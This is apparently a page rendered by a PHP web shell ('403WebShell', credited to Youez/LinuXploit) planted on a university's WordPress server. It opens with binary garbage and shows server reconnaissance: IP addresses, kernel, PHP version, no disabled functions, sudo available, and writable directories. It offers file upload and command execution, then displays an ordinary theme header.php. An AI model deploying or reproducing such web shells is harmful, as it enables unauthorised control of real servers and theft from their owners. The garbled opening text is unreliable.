h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/wp-content/themes/education-xpert/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wp-content/themes/education-xpert/header.php
<?php
/**
 * The header for our theme
 *
 * This is the template that displays all of the <head> section and everything up until <div id="content">
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Educenter
 * @subpackage Education Xpert
 *
 */

?>
<!doctype html>
<html <?php language_attributes(); ?> <?php educenter_html_tag_schema(); ?>>
<head>
	<meta charset="<?php bloginfo( 'charset' ); ?>">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11">

	<?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>

<div id="page" class="site">

	<a class="skip-link screen-reader-text" href="#content">
		<?php esc_html_e( 'Skip to content', 'education-xpert' ); ?>
	</a>

	<header id="masthead" class="site-header general-header headerone" role="banner" itemscope="itemscope" itemtype="http://schema.org/WPHeader">
		<?php
			$top_header_options = get_theme_mod( 'educenter_top_header', 0 );
	   		if($top_header_options == 1 ){ 
	   	?>
	   		<div class="top-header clearfix">
				<div class="container">
					<div class="contact-info left-contact">
						<div class="edu-topnav">
			              	<?php
				                wp_nav_menu( array(
				                  'theme_location'  => 'menu-3',
				                  'menu_id'         => 'top-menu',
				                  'depth' 			=>1
				                ) );
			              	?>
			          	</div>
					</div>

					<div class="right-contact clearfix">
						<?php do_action( 'educenter_social_links', 5 ); ?>
					</div>
				</div>
			</div>
	   	<?php }  ?>

		<div class="bottom-header">
			<div class="container">
				<div class="header-middle-inner">
					<div class="site-branding logo">
						
						<?php the_custom_logo(); ?>

						<div class="brandinglogo-wrap">
							<h1 class="site-title">
								<a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home">
									<?php bloginfo( 'name' ); ?>
								</a>
							</h1>
							<?php
								$description = get_bloginfo( 'description', 'display' );
								if ( $description || is_customize_preview() ) : ?>
									<p class="site-description"><?php echo $description; /* WPCS: xss ok. */ ?></p>
							<?php endif;  ?>
						</div>

						<div class="header-nav-toggle">
				            <div class="one"></div>
				            <div class="two"></div>
				            <div class="three"></div>
				        </div><!-- Mobile navbar toggler -->

					</div><!-- .site-branding -->
					
					
					<div class="contact-info">
					    <div class="quickcontact">
				        	<?php
				                $email_address    = get_theme_mod('educenter_email_address');
				                $phone_number     = get_theme_mod('educenter_phone_number');
				                $phonenumber      = preg_replace("/[^0-9]/","",$phone_number);
				                $map_address      = get_theme_mod('educenter_map_address');
				                $open_time        = get_theme_mod('educenter_opeening_time');

				                if(!empty( $phone_number )) { ?>

				                	<div class="get-tuch text-left">
				                	    <i class="fa fa-phone" aria-hidden="true"></i>
				                	    <ul>
				                	        <li>
				                	            <h4><?php esc_html_e('Phone Number','education-xpert'); ?></h4>
				                	        </li>
				                	        <li>
				                	        	<p>
					                	            <a href="tel:<?php echo esc_attr( $phonenumber ); ?>">
		        			                            <?php echo esc_attr( $phone_number ); ?>
		        			                        </a>
		        			                    </p>
				                	        </li>
				                	    </ul>
				                	</div>

				            <?php }  if(!empty( $map_address )) { ?>

				            		<div class="get-tuch text-left">
				            		    <i class="fa fa-map-marker" aria-hidden="true"></i>
				            		    <ul>
				            		        <li>
				            		            <h4><?php esc_html_e('Contact Address','education-xpert'); ?></h4>
				            		        </li>
				            		        <li>
				            		            <p><?php echo esc_attr( $map_address ); ?></p>
				            		        </li>
				            		    </ul>
				            		</div>
				                    
				            <?php }  if(!empty( $email_address )) { ?>

				            		<div class="get-tuch text-left">
				            		    <i class="fa fa-envelope-o" aria-hidden="true"></i>
				            		    <ul>
				            		        <li>
				            		            <h4><?php esc_html_e('Email Address','education-xpert'); ?></h4>
				            		        </li>
				            		        <li>
				            		            <p>
				            		            	<a href="mailto:<?php echo esc_attr( antispambot( $email_address ) ); ?>">
									                    
									                    <?php echo esc_attr( antispambot( $email_address ) ); ?>
									                </a>
				            		            </p>
				            		        </li>
				            		    </ul>
				            		</div>
				           	
				            <?php }  ?>
					    </div> <!--/ End Contact -->
					</div>
				</div>
			</div>
		</div>
		
		<div class="nav-menu">
			<div class="container">
				<div class="box-header-nav main-menu-wapper">
					<?php
						wp_nav_menu( array(
								'theme_location'  => 'menu-1',
								'menu'            => 'primary-menu',
								'container'       => '',
								'container_class' => '',
								'container_id'    => '',
								'menu_class'      => 'main-menu',
							)
						);
					?>
		        </div>
			</div>
		</div>
		
	</header><!-- #masthead -->

	<div id="content" class="site-content content">
		

Youez - 2016 - github.com/yon3zu
LinuXploit